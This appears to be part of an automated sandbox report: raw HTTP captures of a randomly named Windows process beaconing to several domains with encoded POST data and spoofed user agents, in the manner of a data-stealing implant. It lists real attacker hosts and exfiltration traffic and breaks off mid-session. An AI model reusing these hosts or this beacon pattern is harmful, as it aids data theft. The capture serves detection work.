20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49804	203.161.49.193	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:12.071434975 CET	547	OUT	GET /hxmz/?A69pk=_b0Tr07p9f0pn&R4qXin=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.futurevision.life Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:22:12.767292976 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 15 Nov 2024 03:22:12 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49805	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:17.865537882 CET	823	OUT	POST /slxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.schedulemassage.xyz Referer: http://www.schedulemassage.xyz/slxp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 30 43 37 49 6a 54 56 43 64 39 59 79 78 4a 37 4e 38 49 65 7a 4f 31 2b 64 75 30 36 41 55 4a 4a 67 67 3d 3d Data Ascii: R4qXin=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpW0C7IjTVCd9YyxJ7N8IezO1+du06AUJJgg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49806	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:20.404371977 CET	843	OUT	POST /slxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.schedulemassage.xyz Referer: http://www.schedulemassage.xyz/slxp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 52 4e 41 70 39 4f 4e 58 30 41 37 6f 43 31 62 38 53 36 75 34 75 36 71 4f 68 62 4d 77 38 35 2f 4e 6b 3d Data Ascii: R4qXin=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhORNAp9ONX0A7oC1b8S6u4u6qOhbMw85/Nk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49807	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:22.959628105 CET	10925	OUT	POST /slxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.schedulemassage.xyz Referer: http://www.schedulemassage.xyz/slxp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 6c 4f 78 52 35 4b 44 2f 6c 77 2b 73 46 75 56 2b 6b 6b 4b 6c 38 61 69 50 61 49 66 73 33 76 78 5a 4b 78 75 70 46 56 57 43 67 62 67 4d 30 69 47 78 56 44 53 6b 77 61 37 54 6b 34 4f 66 57 31 73 46 4d 50 69 34 50 6f 72 66 37 4d 41 4e 36 62 67 44 4b 4d 67 52 5a 57 70 37 73 66 6b 33 55 71 42 57 58 46 69 75 31 41 70 68 73 37 45 51 6d 2b 52 4a 7a 72 67 67 76 45 78 4d 32 36 2f 41 67 6d 64 50 32 6b 48 75 6e 44 68 74 78 66 6f 59 57 30 47 2f 63 67 33 42 66 6c 69 47 30 7a 74 37 64 47 58 48 65 [TRUNCATED] Data Ascii: R4qXin=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBelOxR5KD/lw+sFuV+kkKl8aiPaIfs3vxZKxupFVWCgbgM0iGxVDSkwa7Tk4OfW1sFMPi4Porf7MAN6bgDKMgRZWp7sfk3UqBWXFiu1Aphs7EQm+RJzrggvExM26/AgmdP2kHunDhtxfoYW0G/cg3BfliG0zt7dGXHeACcTOvzpfGgY8pRVGavZvf8C2sD3Dl9oXwfO6daqRVmZsi3SUtQV80cc9Wwhv2xu9+xLEGDJFk2RbQQPr67nI3PdY/4Q/jIe1K7g8ZBMmWY4FwU5akpaKHDvlkVLlsd+uPVqTb+odppOAObFki7feBqDBXzUozWTu7KW9wMrliT7f6CTPRj6x2H7YaQ8vqDOhYclbbdFJVkXRTjwzj2U78Jq67Rb/3mFFlr60aQUPqw1pi3IfULb0TxdLJwxGxZED2vCj2Zvc0ETPO9KGPmJHdZLnBXK+KWW2iuXT1Tj44GkwmZCnS7k3ikSRSqA/Ms+jPH9BrTMTfGaChp6N5VOaCY+nCKYDvkNeY4AmeFOznQ0PPI4s2CgCBD3Y8/iGHxuhrzecCefeRW7eBgFtLlX6dQBOXJ04eIUfJS80ybppS6NXv0iyScCLZ+X3R5FO8z6rIuKS5kb0UMOYxOl6YM3pKxJ/9oiUCw/if/Yu/w36EGd1/hClIc5SmhJrIo5IZCSsS38xfulo2mbctqSvIMzIqE7mt+WJV/KI8vCeBbumyFIFah39fly1EpGtGzGjXBoMAdnHMfD92jFDuKxtq5/tAuEECmmSc3De4Pl5B+4m7hftXIut/PsBXMVxxqHHb2d8q4+BwgCiJCpfwnf6CMIJZZZGXZhcStQ3t [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49808	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:25.496463060 CET	549	OUT	GET /slxp/?R4qXin=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.schedulemassage.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:22:26.162233114 CET	402	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 15 Nov 2024 03:22:26 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 71 58 69 6e 3d 51 72 57 73 31 4d 47 62 59 79 51 46 6f 71 33 75 64 53 61 57 32 52 30 77 45 38 64 50 30 2b 76 61 77 54 5a 65 65 49 31 69 38 74 6d 38 6b 78 65 4e 34 6d 52 61 49 5a 51 71 44 6d 53 72 65 31 41 7a 4e 39 73 49 65 47 2b 50 78 51 34 31 45 4c 2b 58 71 6f 6c 4f 73 2f 30 42 6f 34 33 31 34 77 6d 57 36 62 75 53 46 54 38 51 73 31 6b 51 4f 6d 58 54 48 48 6e 57 54 4f 30 3d 26 41 36 39 70 6b 3d 5f 62 30 54 72 30 37 70 39 66 30 70 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R4qXin=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&A69pk=_b0Tr07p9f0pn"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49809	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:31.253324032 CET	805	OUT	POST /0598/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.mcfunding.org Referer: http://www.mcfunding.org/0598/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 6f 49 71 6d 6d 2b 4f 69 61 45 62 57 43 43 77 46 39 30 4d 79 79 6a 77 63 59 52 39 79 34 59 63 43 67 3d 3d Data Ascii: R4qXin=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gvoIqmm+OiaEbWCCwF90MyyjwcYR9y4YcCg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49810	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:33.795819998 CET	825	OUT	POST /0598/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.mcfunding.org Referer: http://www.mcfunding.org/0598/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 48 44 42 66 59 4a 2f 37 6c 56 5a 6e 43 71 4c 71 7a 58 62 75 66 6f 53 58 41 6b 58 44 30 42 2b 67 77 3d Data Ascii: R4qXin=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyHDBfYJ/7lVZnCqLqzXbufoSXAkXD0B+gw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49811	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:36.342225075 CET	10907	OUT	POST /0598/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.mcfunding.org Referer: http://www.mcfunding.org/0598/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 63 55 58 43 2b 4a 4b 63 56 30 78 43 62 53 5a 73 4d 43 2f 35 41 55 53 56 69 30 4c 61 66 50 49 76 37 44 56 30 39 2b 4c 57 59 69 67 6c 31 57 43 49 69 41 52 42 76 65 68 59 75 5a 48 7a 57 49 53 6a 6a 32 76 71 74 44 39 69 78 57 49 55 32 34 69 74 55 32 4c 6d 36 6b 31 74 41 73 71 6f 61 7a 4d 55 5a 74 56 6f 75 34 76 46 65 42 72 77 47 74 6f 54 45 33 73 78 42 64 75 64 45 73 39 79 66 41 50 48 79 6d 42 35 52 55 6e 64 48 42 48 4f 69 35 2f 50 47 4c 72 58 6b 62 67 2b 75 49 56 6c 6e 52 45 6a 6e [TRUNCATED] Data Ascii: R4qXin=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKcUXC+JKcV0xCbSZsMC/5AUSVi0LafPIv7DV09+LWYigl1WCIiARBvehYuZHzWISjj2vqtD9ixWIU24itU2Lm6k1tAsqoazMUZtVou4vFeBrwGtoTE3sxBdudEs9yfAPHymB5RUndHBHOi5/PGLrXkbg+uIVlnREjnUd90t7SocgxdmqW/Sw/rowS8lnd+/G6ZuyKFIRYuvCzH7ydVs8FsThnr+1BIPfwcumU3bnVl7JRgRLUT2EuuR3m4SR9HIGkUP6dWGYxn7W8N7Q7YneYOZ/37+8fwOjOubaIdCKz+yaSY1eL4FpVM/tRyi9gwXa4stEZEixrAfW+YPn7IMsceEcHrHVWJAk/Y5zc0/QGZH0apLxh8eVnVpxKE9NrRd9M/aDereMII0+rh3kvgh2ujvjPryKjtCJrae+yskyoBnQdiyQU6REkebAzCz2RA/MR1Y1XBjDmsloXZmR9dpXSTebopdlEryiCiWojE/5okAL5zdoYX2mDGTJvucjTZKb/Jvd5TWX4dLSBWhudGkQRraretqX5m143PVEPULQVa7JRj6vjdkJ2jtvtPZ6+weVcHIIpj9Os5JPRZHnQbOpvHPHEhT5h4337gCgkMWBbLBLpjQOgi2LX8eroZhrlbspEHRUirE4emdlD1yvlYc+R5IpK3yoAI1dEQiO0oen2XfY8InvqmWWvxqXoWwVIwdrQ5Ev/rDIXPbC+BvLX6NeQEIs+tQQ+dcEBzQ/+uDP57ZnY69+D5ylfPNPoxSWDxtj7DDKXl7tIzpYkgBbG2E1k87zYqPcbZ32OpW2GIUhMlUxMHLIBj6EKZFbgKKrsPrL/Rbl [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49812	3.33.130.190	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:38.895126104 CET	543	OUT	GET /0598/?R4qXin=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:22:39.516020060 CET	402	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 15 Nov 2024 03:22:39 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 71 58 69 6e 3d 74 36 38 42 4e 30 39 69 56 65 71 62 2f 49 75 4d 59 46 6f 67 38 4b 47 63 44 51 69 45 52 36 43 46 49 6f 6f 63 48 51 73 33 6c 6f 7a 71 67 36 50 69 45 34 69 72 5a 42 2b 64 56 6b 52 63 4e 4b 6e 33 71 71 59 54 66 7a 2b 55 32 4b 4b 73 6b 64 52 73 76 47 76 34 64 4f 57 57 69 54 79 4d 58 76 46 38 6b 79 78 31 4b 45 4f 65 51 58 63 2f 79 56 68 58 78 6e 45 72 63 32 4d 3d 26 41 36 39 70 6b 3d 5f 62 30 54 72 30 37 70 39 66 30 70 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R4qXin=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&A69pk=_b0Tr07p9f0pn"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49813	198.252.98.54	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:44.592957973 CET	817	OUT	POST /y3dc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.migorengya8.click Referer: http://www.migorengya8.click/y3dc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 69 77 4d 7a 34 58 74 7a 71 46 51 54 68 36 69 76 77 6b 4a 38 68 4b 46 36 30 33 42 51 33 6e 4b 4b 2b 4d 6f 70 38 55 42 71 4f 70 70 63 66 33 76 70 61 47 72 52 4e 31 6e 63 69 44 38 6b 53 46 39 39 63 4d 62 42 2b 4d 70 4d 66 54 6a 70 79 2b 35 6d 36 52 6f 